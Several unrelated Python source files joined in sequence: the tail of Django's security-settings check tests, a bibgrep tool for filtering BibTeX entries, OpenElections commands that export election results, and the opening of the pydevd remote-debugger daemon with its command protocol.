SECURE_HSTS_SECONDS=None,
)
def test_no_sts_preload_no_seconds(self):
"""
Don't warn if SECURE_HSTS_SECONDS isn't set.
"""
self.assertEqual(base.check_sts_preload(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_PRELOAD=True,
SECURE_HSTS_SECONDS=3600,
)
def test_with_sts_preload(self):
self.assertEqual(base.check_sts_preload(None), [])
class CheckXFrameOptionsMiddlewareTest(SimpleTestCase):
@override_settings(MIDDLEWARE=[])
def test_middleware_not_installed(self):
"""
Warn if XFrameOptionsMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_xframe_options_middleware(None), [base.W002])
@override_settings(MIDDLEWARE=["django.middleware.clickjacking.XFrameOptionsMiddleware"])
def test_middleware_installed(self):
self.assertEqual(base.check_xframe_options_middleware(None), [])
class CheckXFrameOptionsDenyTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.clickjacking.XFrameOptionsMiddleware"],
X_FRAME_OPTIONS='SAMEORIGIN',
)
def test_x_frame_options_not_deny(self):
"""
Warn if XFrameOptionsMiddleware is in MIDDLEWARE but
X_FRAME_OPTIONS isn't 'DENY'.
"""
self.assertEqual(base.check_xframe_deny(None), [base.W019])
@override_settings(MIDDLEWARE=[], X_FRAME_OPTIONS='SAMEORIGIN')
def test_middleware_not_installed(self):
"""
No error if XFrameOptionsMiddleware isn't in MIDDLEWARE even if
X_FRAME_OPTIONS isn't 'DENY'.
"""
self.assertEqual(base.check_xframe_deny(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.clickjacking.XFrameOptionsMiddleware"],
X_FRAME_OPTIONS='DENY',
)
def test_xframe_deny(self):
self.assertEqual(base.check_xframe_deny(None), [])
class CheckContentTypeNosniffTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_CONTENT_TYPE_NOSNIFF=False,
)
def test_no_content_type_nosniff(self):
"""
Warn if SECURE_CONTENT_TYPE_NOSNIFF isn't True.
"""
self.assertEqual(base.check_content_type_nosniff(None), [base.W006])
@override_settings(MIDDLEWARE=[], SECURE_CONTENT_TYPE_NOSNIFF=False)
def test_no_content_type_nosniff_no_middleware(self):
"""
Don't warn if SECURE_CONTENT_TYPE_NOSNIFF isn't True and
SecurityMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_content_type_nosniff(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_CONTENT_TYPE_NOSNIFF=True,
)
def test_with_content_type_nosniff(self):
self.assertEqual(base.check_content_type_nosniff(None), [])
class CheckSSLRedirectTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=False,
)
def test_no_ssl_redirect(self):
"""
Warn if SECURE_SSL_REDIRECT isn't True.
"""
self.assertEqual(base.check_ssl_redirect(None), [base.W008])
@override_settings(MIDDLEWARE=[], SECURE_SSL_REDIRECT=False)
def test_no_ssl_redirect_no_middleware(self):
"""
Don't warn if SECURE_SSL_REDIRECT is False and SecurityMiddleware isn't
installed.
"""
self.assertEqual(base.check_ssl_redirect(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=True,
)
def test_with_ssl_redirect(self):
self.assertEqual(base.check_ssl_redirect(None), [])
class CheckSecretKeyTest(SimpleTestCase):
@override_settings(SECRET_KEY=('abcdefghijklmnopqrstuvwx' * 2) + 'ab')
def test_okay_secret_key(self):
self.assertEqual(len(settings.SECRET_KEY), base.SECRET_KEY_MIN_LENGTH)
self.assertGreater(len(set(settings.SECRET_KEY)), base.SECRET_KEY_MIN_UNIQUE_CHARACTERS)
self.assertEqual(base.check_secret_key(None), [])
@override_settings(SECRET_KEY='')
def test_empty_secret_key(self):
self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY=None)
def test_missing_secret_key(self):
del settings.SECRET_KEY
self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY=None)
def test_none_secret_key(self):
self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY=('abcdefghijklmnopqrstuvwx' * 2) + 'a')
def test_low_length_secret_key(self):
self.assertEqual(len(settings.SECRET_KEY), base.SECRET_KEY_MIN_LENGTH - 1)
self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY='abcd' * 20)
def test_low_entropy_secret_key(self):
self.assertGreater(len(settings.SECRET_KEY), base.SECRET_KEY_MIN_LENGTH)
self.assertLess(len(set(settings.SECRET_KEY)), base.SECRET_KEY_MIN_UNIQUE_CHARACTERS)
self.assertEqual(base.check_secret_key(None), [base.W009])
class CheckDebugTest(SimpleTestCase):
@override_settings(DEBUG=True)
def test_debug_true(self):
"""
Warn if DEBUG is True.
"""
self.assertEqual(base.check_debug(None), [base.W018])
@override_settings(DEBUG=False)
def test_debug_false(self):
self.assertEqual(base.check_debug(None), [])
class CheckAllowedHostsTest(SimpleTestCase):
@override_settings(ALLOWED_HOSTS=[])
def test_allowed_hosts_empty(self):
self.assertEqual(base.check_allowed_hosts(None), [base.W020])
@override_settings(ALLOWED_HOSTS=['.example.com'])
def test_allowed_hosts_set(self):
self.assertEqual(base.check_allowed_hosts(None), [])
class CheckReferrerPolicyTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=['django.middleware.security.SecurityMiddleware'],
SECURE_REFERRER_POLICY=None,
)
def test_no_referrer_policy(self):
self.assertEqual(base.check_referrer_policy(None), [base.W022])
@override_settings(MIDDLEWARE=[], SECURE_REFERRER_POLICY=None)
def test_no_referrer_policy_no_middleware(self):
"""
Don't warn if SECURE_REFERRER_POLICY is None and SecurityMiddleware
isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_referrer_policy(None), [])
@override_settings(MIDDLEWARE=['django.middleware.security.SecurityMiddleware'])
def test_with_referrer_policy(self):
tests = (
'strict-origin',
'strict-origin,origin',
'strict-origin, origin',
['strict-origin', 'origin'],
('strict-origin', 'origin'),
)
for value in tests:
with self.subTest(value=value), override_settings(SECURE_REFERRER_POLICY=value):
self.assertEqual(base.check_referrer_policy(None), [])
@override_settings(
MIDDLEWARE=['django.middleware.security.SecurityMiddleware'],
SECURE_REFERRER_POLICY='invalid-value',
)
def test_with_invalid_referrer_policy(self):
self.assertEqual(base.check_referrer_policy(None), [base.E023])
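# For reference, a settings fragment that would satisfy every check exercised
# above might look like the following (illustrative only; not used by these
# tests):
#
#   SECRET_KEY = '<a long, random, unique string>'
#   DEBUG = False
#   ALLOWED_HOSTS = ['.example.com']
#   SESSION_COOKIE_SECURE = True
#   SESSION_COOKIE_HTTPONLY = True
#   CSRF_COOKIE_SECURE = True
#   SECURE_SSL_REDIRECT = True
#   SECURE_HSTS_SECONDS = 3600
#   SECURE_HSTS_INCLUDE_SUBDOMAINS = True
#   SECURE_HSTS_PRELOAD = True
#   SECURE_CONTENT_TYPE_NOSNIFF = True
#   SECURE_REFERRER_POLICY = 'same-origin'
#   X_FRAME_OPTIONS = 'DENY'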
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""bibgrep: Grep for bib(la)tex files.
To get all articles where the author contains 'Johnson' and the article is from
2010 or beyond:
>>> bibgrep --entry="article" --field="author~Johnson" --field="year>=2010"
The key, entry and field arguments take strings in a mini query language. For
keys and entries, the format is:
"[^][~]<key>"
"[^][~]<bibtype>"
where <key> is something like 'Johnson2002' and <bibtype> is 'article',
'inproceedings' etc. The caret denotes negation, and the tilde denotes
approximate matches instead of exact. For example, '~ceed' would match the
'proceedings', 'inproceedings' and 'mvproceedings' entries. The language for
fields is slightly more involved:
Field occurrence: "[^]<field_name>"
Field values : "[^]<field_name>(=|~)<value>"
Field range : "[^]<field_name>(<|>|<=|>=|=)<numeric_value>"
Field range : "[^]<numeric_value>(<|<=)<field_name>(<|<=)<numeric_value>"
Field range : "[^]<field_name>=<numeric_value>-<numeric_value>"
All punctuation has the same meaning as for keys and entries. Here are some
example queries:
Find entries that have a publisher field.
>>> bibgrep --field="publisher"
Find entries that do not have a note field.
>>> bibgrep --field="^note"
Find entries where the author is exactly 'D. A. Johnson' and the title contains
the word 'concurrency'.
>>> bibgrep --field="author=D. A. Johnson" --field="title~concurrency"
Find entries that were published in 2001 or later and whose volume is not
between 11 and 50.
>>> bibgrep --field="year>=2001" --field="^10<volume<=50"
Find entries that were published between 2000 and 2018 inclusive.
>>> bibgrep --field="year=2000-2018"
"""
import argparse
import bibpy
import bibpy.parser
import bibpy.tools
import itertools
import operator
import re
import os
import signal
import sys
__author__ = bibpy.__author__
__version__ = '0.1.0'
__license__ = bibpy.__license__
# TODO: How to combine predicates with '&&' and '||'?
# TODO: Make approximate matches use regexes
_DESCRIPTION = """Grep bib(la)tex files satisfying some predicates."""
_NAME_TO_OPERATOR = {
'<': operator.lt,
'>': operator.gt,
'<=': operator.le,
'>=': operator.ge,
'=': operator.eq
}
def sigterm_handler(signum, stack_frame):
"""Handle SIGTERM signal."""
sys.exit('bibgrep: Caught SIGTERM')
# Set up a signal handler for SIGTERM
signal.signal(signal.SIGTERM, sigterm_handler)
class BibgrepError(Exception):
"""Exception class for errors specific to bibgrep."""
pass
def approx_field_predicate(field, value, args):
"""Return a function that does an approximate match of a string."""
flags = re.I if args.ignore_case else 0
def _approx_match(entry):
field_value = getattr(entry, field, None)
if field_value is None:
return False
else:
return re.search(value, field_value, flags)
return _approx_match
def exact_field_predicate(field, value, args):
"""Return a function that does an exact match of a string."""
func = str.lower if args.ignore_case else str
def _exact_match(entry):
return func(getattr(entry, field, '')) == func(value)
return _exact_match
def field_occurrence_predicate(field, args):
"""Return a function that checks for the occurrence of a field."""
newfield = field.lower() if args.ignore_case else field
def _field_occurrence(entry):
return bool(getattr(entry, newfield, None))
return _field_occurrence
def negate(func):
"""Return a new function that negates the boolean result of func."""
def _negate(entry):
return not func(entry)
return _negate
def operator_from_string(op_name):
"""Return an operator function from its string equivalent."""
op = _NAME_TO_OPERATOR.get(op_name, None)
if op is None:
raise BibgrepError("Invalid operator '{0}'".format(op_name))
return op
def comparison_predicate(field, op_name, value):
"""Return a predicate function that compares a field to a value."""
operator = operator_from_string(op_name)
def _comparison_predicate(entry):
if not field:
return False
attr = getattr(entry, field, None)
try:
return attr and operator(int(attr), int(value))
except ValueError:
raise BibgrepError(
"Cannot compare '{0}' with '{1}'".format(value, attr)
)
return _comparison_predicate
def check_and_get_bounds(lower, upper):
"""Convert string bounds to integers and check if lower <= upper."""
try:
ilower = int(lower)
iupper = int(upper)
except ValueError:
raise BibgrepError('Bounds cannot be converted to integers')
if ilower > iupper:
raise BibgrepError('Lower bound must be <= upper bound')
return ilower, iupper
def interval_predicate(field, lower, upper):
"""Return a predicate function that checks if a field is in an interval."""
ilower, iupper = check_and_get_bounds(lower, upper)
def _interval_predicate(entry):
if not field:
return False
attr = getattr(entry, field, None)
try:
return attr and ilower <= int(attr) <= iupper
except ValueError:
raise BibgrepError(
"Cannot compare '{0}' with interval [{1}, {2}]"
.format(attr, lower, upper)
)
return _interval_predicate
def range_predicate(lower, op_name1, field, op_name2, upper):
"""Return a predicate function that checks if a field is in a range.
Example: '1 <= series < 10'
"""
ilower, iupper = check_and_get_bounds(lower, upper)
operator1 = operator_from_string(op_name1)
operator2 = operator_from_string(op_name2)
def _range_predicate(entry):
attr = getattr(entry, field, None)
try:
if attr:
iattr = int(attr)
return operator1(ilower, iattr) and operator2(iattr, iupper)
except ValueError:
raise BibgrepError(
"Cannot compare '{0}' with range {1} {2} field {3} {4}"
.format(attr, lower, op_name1, op_name2, upper)
)
return _range_predicate
def construct_key_entry_predicate(name, key, tokens, args):
"""Return a key/entry predicate to test if they are of given types."""
f = None
prefix_op = tokens[0] if tokens[0] else ''
if prefix_op and not set(prefix_op).issubset(set('^~')):
raise BibgrepError("Invalid field operator(s) '{0}'".format(tokens[0]))
if '~' in prefix_op:
f = approx_field_predicate(key, tokens[1], args)
else:
f = exact_field_predicate(key, tokens[1], args)
if '^' in prefix_op:
f = negate(f)
return f
def construct_field_predicate(name, key, tokens, args):
"""Return a predicate function from the parsed tokens of a query."""
predicate = None
if name == 'value':
if tokens[2] == '=':
predicate = exact_field_predicate(tokens[1], tokens[-1], args)
elif tokens[2] == '~':
predicate = approx_field_predicate(tokens[1], tokens[-1], args)
else:
raise BibgrepError(
"Invalid field operator '{0}'".format(tokens[1])
)
elif name == 'occurrence':
predicate = field_occurrence_predicate(tokens[1], args)
elif name == 'comparison':
predicate = comparison_predicate(*tokens[1:])
elif name == 'interval':
predicate = interval_predicate(*tokens[1:])
elif name == 'range':
predicate = range_predicate(*tokens[1:])
elif name == 'value':
predicate = comparison_predicate(*tokens[1:])
else:
raise BibgrepError('Invalid field query syntax')
neg = tokens[0] == '^'
return negate(predicate) if neg else predicate
def construct_predicates(values, predicate_func, key, pred_combiner, args):
"""Return a list of predicates on entries."""
# Parse and compose all predicates on values given on the command line
predicates = []
for value in values:
name, tokens = bibpy.parser.parse_query(value, key)
predicates.append(predicate_func(name, key, tokens, args))
return bibpy.tools.compose_predicates(predicates, pred_combiner)
def filter_entries(entries, predicates):
"""Filter entries based on predicates on entry type, key and fields."""
for entry in entries:
if any(pred(entry) for pred in predicates):
yield entry
def unique_entries(entries):
"""Remove duplicates from a set of entries."""
return [k for k, _ in itertools.groupby(entries)]
def process_file(source, unique, predicates):
"""Process a single bibliographic file."""
entries = bibpy.read_file(source).entries
if unique:
entries = unique_entries(entries)
return filter_entries(entries, predicates)
def main():
parser = argparse.ArgumentParser(prog='bibgrep', description=_DESCRIPTION)
parser.add_argument(
'-v', '--version',
action='version',
version=bibpy.tools.format_version(__version__)
)
parser.add_argument(
'-e', '--entry',
action='append',
help="Print entries matching an entry type (e.g. '@article')"
)
parser.add_argument(
'-k', '--key',
action='append',
dest='keys',
help='Print entries with exact or similar key. For example, '
"--key='article1 | article2' prints the entries with keys that "
'match either'
)
parser.add_argument(
'-f', '--field',
type=str,
action='append',
dest='fields',
help='Print entries that satisfy a list of field constraints'
)
parser.add_argument(
'-c', '--count',
action='store_true',
help='Only a count of selected entries is written to standard output. '
'If -n is given, prints a grand total'
)
parser.add_argument(
'-i', '--ignore-case',
action='store_true',
help='Perform case insensitive matching. By default, bibgrep is case '
'sensitive'
)
parser.add_argument(
'-r', '--recursive',
action='store_true',
help='Recursively search listed subdirectories'
)
parser.add_argument(
'-u', '--unique',
action='store_true',
help='Print only one entry if duplicates are encountered'
)
parser.add_argument(
'-n', '--no-filenames',
action='store_true',
help='Do not print filename headers before each entry when --count is '
'given. Overrides --abbreviate-filenames'
)
parser.add_argument(
'-a', '--abbreviate-filenames',
action='store_true',
help='Display only filename and not the full path when --count is '
'given'
)
args, rest = parser.parse_known_args()
key_predicate = bibpy.tools.always_false
entry_predicate = bibpy.tools.always_false
field_predicate = bibpy.tools.always_false
try:
if args.keys:
key_predicate = construct_predicates(
args.keys,
construct_key_entry_predicate,
'bibkey',
any,
args
)
if args.entry:
bibtypes = [
e for es in args.entry for e in map(str.strip, es.split(','))
]
entry_predicate = construct_predicates(
bibtypes,
construct_key_entry_predicate,
'bibtype',
any,
args
)
if args.fields:
field_predicate = construct_predicates(
args.fields,
construct_field_predicate,
'field',
any,
args
)
except (BibgrepError, bibpy.error.ParseException) as ex:
sys.exit('{0}'.format(ex))
if not args.keys and not args.entry and not args.fields:
# If no constraints are defined, all entries pass
key_predicate = bibpy.tools.always_true
entry_predicate = bibpy.tools.always_true
field_predicate = bibpy.tools.always_true
filtered_entries = []
total_count = 0
predicates = [entry_predicate, key_predicate, field_predicate]
try:
if not rest:
filtered_entries = process_file(sys.stdin, args.unique, predicates)
if args.count:
num_entries = len(list(filtered_entries))
total_count += num_entries
filtered_entries = []
else:
bib_files = bibpy.tools.iter_files(rest, '*.bib', args.recursive)
for filename in bib_files:
filtered_entries += list(
process_file(filename, args.unique, predicates)
)
if args.count:
if args.no_filenames:
total_count += len(filtered_entries)
else:
if args.abbreviate_filenames:
filename = os.path.basename(filename)
print('{0}:{1}'.format(
filename, len(filtered_entries))
)
filtered_entries = []
except (IOError, bibpy.error.ParseException, BibgrepError) as ex:
sys.exit('bibgrep: {0}'.format(ex))
except KeyboardInterrupt:
sys.exit(1)
if args.count and (args.no_filenames or not rest):
print(total_count)
if filtered_entries:
# Write all filtered entries to sys.stdout
print(bibpy.write_string(filtered_entries))
bibpy.tools.close_output_handles()
if __name__ == "__main__":
main()
|
|
from datetime import datetime
import json
import os.path
import re
import sys
import click
from openelex.api import elections as elec_api
from openelex.base.bake import Baker, RawBaker, reporting_levels_for_election
from openelex.base.publish import published_url
from openelex.lib import format_date, compose
from openelex.us import STATE_POSTALS
BASE_OPTIONS = [
click.option('--state', required=True, help="Two-letter state abbreviation, e.g. NY"),
click.option('--fmt', help="Format of output files. Can be 'csv' or "
"'json'. Defaults is 'csv'.", default="csv"),
click.option('--outputdir', help="Directory where output files will be "
"written. Defaults to 'openelex/us/bakery'"),
click.option('--electiontype', help="Only bake results for election of "
"this type. Can be 'primary' or 'general'. Default is to bake results "
"for all types of elections"),
click.option('--level', help="Only bake results aggregated at this "
"reporting level. Values can be things like 'precinct' or 'county'. "
"Default is to bake results for all reporting levels."),
click.option('--raw', help="Bake raw results. Default is to bake "
"cleaned/standardized results", is_flag=True),
]
STATE_FILE_OPTIONS = list(BASE_OPTIONS)
STATE_FILE_OPTIONS.append(click.option('--datefilter', help="Date specified "
"in 'YYYY' or 'YYYY-MM-DD' format. Results will only be baked for "
"elections with a start date matching the date string"))
def base_options(f):
"""Decorator for default options"""
decorator_stack = compose(*BASE_OPTIONS)
return decorator_stack(f)
def state_file_options(f):
"""Decorator for options for the state_file command"""
decorator_stack = compose(*STATE_FILE_OPTIONS)
return decorator_stack(f)
@click.command(name='bake.state_file', help="Write election and candidate data "
"along with a manifest to structured files")
@state_file_options
def state_file(state, fmt='csv', outputdir=None, datefilter=None,
electiontype=None, level=None, raw=False):
"""
Writes election and candidate data, along with a manifest to structured
files.
Args:
state: Required. Postal code for a state. For example, "md".
fmt: Format of output files. This can be "csv" or "json". Defaults
to "csv".
outputdir: Directory where output files will be written. Defaults to
"openelections/us/bakery"
datefilter: Date specified in "YYYY" or "YYYY-MM-DD" used to filter
elections before they are baked.
electiontype: Election type. For example, general, primary, etc.
level: Reporting level of the election results. For example, "state",
"county", "precinct", etc. Value must be one of the options
specified in openelex.models.Result.REPORTING_LEVEL_CHOICES.
raw: Bake RawResult records instead of cleaned and transformed results.
"""
# TODO: Decide if datefilter should be required due to performance
# considerations.
# TODO: Implement filtering by office, district and party after
# the data is standardized
# TODO: Filtering by election type and level
timestamp = datetime.now()
filter_kwargs = {}
if electiontype:
filter_kwargs['election_type'] = electiontype
if level:
filter_kwargs['reporting_level'] = level
if raw:
baker = RawBaker(state=state, datefilter=datefilter, **filter_kwargs)
else:
baker = Baker(state=state, datefilter=datefilter, **filter_kwargs)
baker.collect_items() \
.write(fmt, outputdir=outputdir, timestamp=timestamp) \
.write_manifest(outputdir=outputdir, timestamp=timestamp)
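# Illustrative sketch (not part of the module): the command above can also be
# exercised programmatically with click's test runner. The state and
# datefilter values below are placeholders.
def _example_invoke_state_file():
    from click.testing import CliRunner
    runner = CliRunner()
    # Roughly equivalent to running the bake.state_file command from the CLI
    return runner.invoke(state_file, ['--state', 'md', '--datefilter', '2012'])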
def get_elections(state, datefilter=None):
"""
Get all elections.
Args:
state: Required. Postal code for a state. For example, "md".
datefilter: Date specified in "YYYY" or "YYYYMMDD" used to filter
elections before they are baked.
Returns:
A list of dictionaries, each describing an election for the specified
state. The elections are sorted by date.
"""
elections = elec_api.find(state.upper())
if datefilter:
date_prefix = format_date(datefilter)
elections = [elec for elec in elections
if elec['start_date'].startswith(date_prefix)]
return sorted(elections, key=lambda x: x['start_date'])
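# Example of a single returned element (illustrative; only the keys the
# helpers below rely on are shown, and the values are placeholders):
#
#   {'state': {'postal': 'MD'}, 'start_date': '2012-04-03',
#    'race_type': 'primary', 'special': False, ...}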
def get_election_dates_types(state, datefilter=None):
"""Get all election dates and types for a state"""
return [(elec['start_date'].replace('-', ''), elec['race_type'])
for elec in get_elections(state, datefilter)]
ELECTION_FILE_OPTIONS = list(BASE_OPTIONS)
ELECTION_FILE_OPTIONS.append(click.option('--datefilter', help="Day of year, "
"specified in YYYYMMDD format. Results will only be baked for elections "
"with a start date matching the date string. Default is to bake results "
"for all elections."))
def election_file_options(f):
"""Decorator for options fo the election_file command"""
decorator_stack = compose(*ELECTION_FILE_OPTIONS)
return decorator_stack(f)
@click.command(name="bake.election_file", help="Write election and candidate "
"data with on election per file")
@election_file_options
def election_file(state, fmt='csv', outputdir=None, datefilter=None,
electiontype=None, level=None, raw=False):
"""
Write election and candidate data with one election per file.
"""
timestamp = datetime.now()
if raw:
baker_cls = RawBaker
else:
baker_cls = Baker
if datefilter is None or re.match(r'\d{4}$', datefilter):
# No date was specified, so bake all elections; or the date filter is a
# single year, so bake all elections for that year.
elections = get_election_dates_types(state, datefilter)
else:
# Date filter is for a day, grab that election specifically
if electiontype is None:
msg = "You must specify the election type when baking results for a single date."
sys.exit(msg)
elections = [(datefilter, electiontype)]
for election_date, election_type in elections:
if level is not None:
reporting_levels = [level]
else:
reporting_levels = reporting_levels_for_election(state, election_date,
election_type, raw)
for reporting_level in reporting_levels:
msg = "Baking {} level results for {} election on {}\n".format(
reporting_level, election_type, election_date)
sys.stdout.write(msg)
baker = baker_cls(state=state, datefilter=election_date,
election_type=election_type, reporting_level=reporting_level)
baker.collect_items()\
.write(fmt, outputdir=outputdir, timestamp=timestamp) \
.write_manifest(outputdir=outputdir, timestamp=timestamp)
def result_urls(election, raw=False):
urls = {}
state = election['state']['postal']
datefilter = election['start_date'].replace('-', '')
if raw:
baker_cls = RawBaker
else:
baker_cls = Baker
for level in reporting_levels_for_election(state, datefilter,
election['race_type'], raw):
filename = baker_cls.filename("csv", state=state, datefilter=datefilter,
election_type=election['race_type'], reporting_level=level)
urls[level] = published_url(state, filename, raw)
return urls
@click.command(name="bake.results_status_json", help="Output a JSON file "
"describing available results for each election")
@click.option('--state', help="Two-letter state-abbreviation, e.g. NY")
@click.option('--bakeall', is_flag=True, help='Bake metadata for all states '
'instead of the specified state')
@click.option('--outputdir', help='Create JSON files in this directory. '
'If baking a single file, output is sent to stdout.')
def results_status_json(state=None, bakeall=False, outputdir=None):
"""
Output a JSON file describing available results for each election.
The JSON is intended to be consumed by the results front-end website.
Args:
state (string): State abbreviation.
bakeall (boolean): If true, bake metadata for all states instead of the
specified state.
outputdir (string): If ``bakeall`` is true, files will be created in this
directory. If baking a single file, output is sent to stdout.
"""
filename_tpl = "elections-{}.json"
if state:
# Bake metadata for a single state to stdout
print json.dumps(statuses_for_state(state))
sys.exit(0)
if not (bakeall and outputdir):
# Bad arguments. Output a message and exit.
msg = ("You must specify a state or the --bakeall flag and an "
"output directory")
sys.exit(msg)
# The user has specified the bakeall flag and an outputdir. Bake files for
# all states.
for state in STATE_POSTALS:
statuses = statuses_for_state(state)
output_path = os.path.join(outputdir,
filename_tpl.format(state.lower()))
with open(output_path, 'w') as f:
json.dump(statuses, f)
def statuses_for_state(state):
"""
Get metadata about available results for a state.
Args:
state (string): State abbreviation.
Returns:
A list of dictionaries where each dictionary represents information
about a single election.
"""
statuses = []
for election in get_elections(state):
status = {
'state': election['state']['postal'],
'start_date': election['start_date'],
'special': election['special'],
'year': datetime.strptime(election['start_date'], "%Y-%m-%d").year,
'race_type': election['race_type'],
'results': result_urls(election),
'results_raw': result_urls(election, raw=True),
'prez': election['prez'],
'senate': election['senate'],
'house': election['house'],
'gov': election['gov'],
'state_officers': election['state_officers'],
'state_leg': election['state_leg'],
'state_level_status': reporting_level_status(election, 'state'),
'county_level_status': reporting_level_status(election, 'county'),
'precinct_level_status': reporting_level_status(election,
'precinct'),
'cong_dist_level_status': reporting_level_status(election,
'cong_dist'),
'state_leg_level_status': reporting_level_status(election,
'state_leg'),
}
statuses.append(status)
return statuses
def reporting_level_status(election, reporting_level):
"""
Get the availability of results for a reporting level
This uses provisional logic to prepare the metadata for the website
launch for ONA 2014. It is designed to show the likely availability of
results with a minimum of backfilling the '{reporting_level}_level_status'.
As we progress, we should just use the value of the
'{reporting_level}_level_status' fields.
Args:
election (dict): Election dict as returned by ``get_elections()``
reporting_level (string): Reporting level ID. Should be "state",
"county", "precinct", "cong_dist" or "state_leg"
Returns:
Slug string representing the availability of results at this reporting
level. See hub.models.Election.LEVEL_STATUS_CHOICES in the dashboard
app (https://github.com/openelections/dashboard) for values.
"""
level_status = election[reporting_level + '_level_status']
levels = ('county', 'precinct', 'cong_dist', 'state_leg')
for level in levels:
# If any of the level status fields is set to a non-default value
# (i.e. something other than None or an empty string), just return the
# requested level's status as-is.
if election[level + '_level_status']:
return level_status
# The level status has not been explicitly set. Look at the
# {reporting_level}_level field
if election[reporting_level + '_level']:
return 'yes'
else:
return 'no'
|
|
''' pydevd - a debugging daemon
This is the daemon you launch for python remote debugging.
Protocol:
each command has a format:
id\tsequence-num\ttext
id: protocol command number
sequence-num: each request has a sequence number. Sequence numbers
originating at the debugger are odd, sequence numbers originating
at the daemon are even. Every response uses the same sequence number
as the request.
payload: it is protocol dependent. When response is a complex structure, it
is returned as XML. Each attribute value is urlencoded, and then the whole
payload is urlencoded again to prevent stray characters corrupting protocol/xml encodings
Commands:
NUMBER NAME FROM* ARGUMENTS RESPONSE NOTE
100 series: program execution
101 RUN JAVA - -
102 LIST_THREADS JAVA RETURN with XML listing of all threads
103 THREAD_CREATE PYDB - XML with thread information
104 THREAD_KILL JAVA id (or * to exit) kills the thread
PYDB id notifies JAVA that thread was killed
105 THREAD_SUSPEND JAVA XML of the stack, suspends the thread
reason for suspension
PYDB id notifies JAVA that thread was suspended
106 CMD_THREAD_RUN JAVA id resume the thread
PYDB id \t reason notifies JAVA that thread was resumed
107 STEP_INTO JAVA thread_id
108 STEP_OVER JAVA thread_id
109 STEP_RETURN JAVA thread_id
110 GET_VARIABLE JAVA thread_id \t frame_id \t GET_VARIABLE with XML of var content
FRAME|GLOBAL \t attributes*
111 SET_BREAK JAVA file/line of the breakpoint
112 REMOVE_BREAK JAVA file/line of the return
113 CMD_EVALUATE_EXPRESSION JAVA expression result of evaluating the expression
114 CMD_GET_FRAME JAVA request for frame contents
115 CMD_EXEC_EXPRESSION JAVA
116 CMD_WRITE_TO_CONSOLE PYDB
117 CMD_CHANGE_VARIABLE
118 CMD_RUN_TO_LINE
119 CMD_RELOAD_CODE
120 CMD_GET_COMPLETIONS JAVA
500 series diagnostics/ok
501 VERSION either Version string (1.0) Currently just used at startup
502 RETURN either Depends on caller -
900 series: errors
901 ERROR either - This is reserved for unexpected errors.
* JAVA - remote debugger, the java end
* PYDB - pydevd, the python end
'''
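# Example exchange (illustrative only; the thread id is a placeholder):
#
#   debugger -> daemon:   107\t13\t<thread_id>         CMD_STEP_INTO, odd seq from the debugger
#   daemon   -> debugger: 103\t2\t<xml thread info>    CMD_THREAD_CREATE, even seq from the daemon
#
# Every line on the wire has the '<id>\t<sequence-num>\t<payload>\n' shape
# described above; the payload is url-quoted before being sent.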
from pydevd_constants import * #@UnusedWildImport
import sys
if USE_LIB_COPY:
import _pydev_time as time
import _pydev_threading as threading
try:
import _pydev_thread as thread
except ImportError:
import _thread as thread #Py3K changed it.
import _pydev_Queue as _queue
from _pydev_socket import socket
from _pydev_socket import AF_INET, SOCK_STREAM
from _pydev_socket import SHUT_RD, SHUT_WR
else:
import time
import threading
try:
import thread
except ImportError:
import _thread as thread #Py3K changed it.
try:
import Queue as _queue
except ImportError:
import queue as _queue
from socket import socket
from socket import AF_INET, SOCK_STREAM
from socket import SHUT_RD, SHUT_WR
try:
from urllib import quote
except:
from urllib.parse import quote #@Reimport @UnresolvedImport
import pydevd_vars
import pydev_log
import pydevd_tracing
import pydevd_vm_type
import pydevd_file_utils
import traceback
from pydevd_utils import *
from pydevd_utils import quote_smart as quote
from pydevd_tracing import GetExceptionTracebackStr
import pydevconsole
try:
_Thread_stop = threading.Thread._Thread__stop
except AttributeError:
_Thread_stop = threading.Thread._stop # _stop in Python 3
CMD_RUN = 101
CMD_LIST_THREADS = 102
CMD_THREAD_CREATE = 103
CMD_THREAD_KILL = 104
CMD_THREAD_SUSPEND = 105
CMD_THREAD_RUN = 106
CMD_STEP_INTO = 107
CMD_STEP_OVER = 108
CMD_STEP_RETURN = 109
CMD_GET_VARIABLE = 110
CMD_SET_BREAK = 111
CMD_REMOVE_BREAK = 112
CMD_EVALUATE_EXPRESSION = 113
CMD_GET_FRAME = 114
CMD_EXEC_EXPRESSION = 115
CMD_WRITE_TO_CONSOLE = 116
CMD_CHANGE_VARIABLE = 117
CMD_RUN_TO_LINE = 118
CMD_RELOAD_CODE = 119
CMD_GET_COMPLETIONS = 120
CMD_CONSOLE_EXEC = 121
CMD_ADD_EXCEPTION_BREAK = 122
CMD_REMOVE_EXCEPTION_BREAK = 123
CMD_LOAD_SOURCE = 124
CMD_ADD_DJANGO_EXCEPTION_BREAK = 125
CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126
CMD_SET_NEXT_STATEMENT = 127
CMD_SMART_STEP_INTO = 128
CMD_EXIT = 129
CMD_SIGNATURE_CALL_TRACE = 130
CMD_VERSION = 501
CMD_RETURN = 502
CMD_ERROR = 901
ID_TO_MEANING = {
'101':'CMD_RUN',
'102':'CMD_LIST_THREADS',
'103':'CMD_THREAD_CREATE',
'104':'CMD_THREAD_KILL',
'105':'CMD_THREAD_SUSPEND',
'106':'CMD_THREAD_RUN',
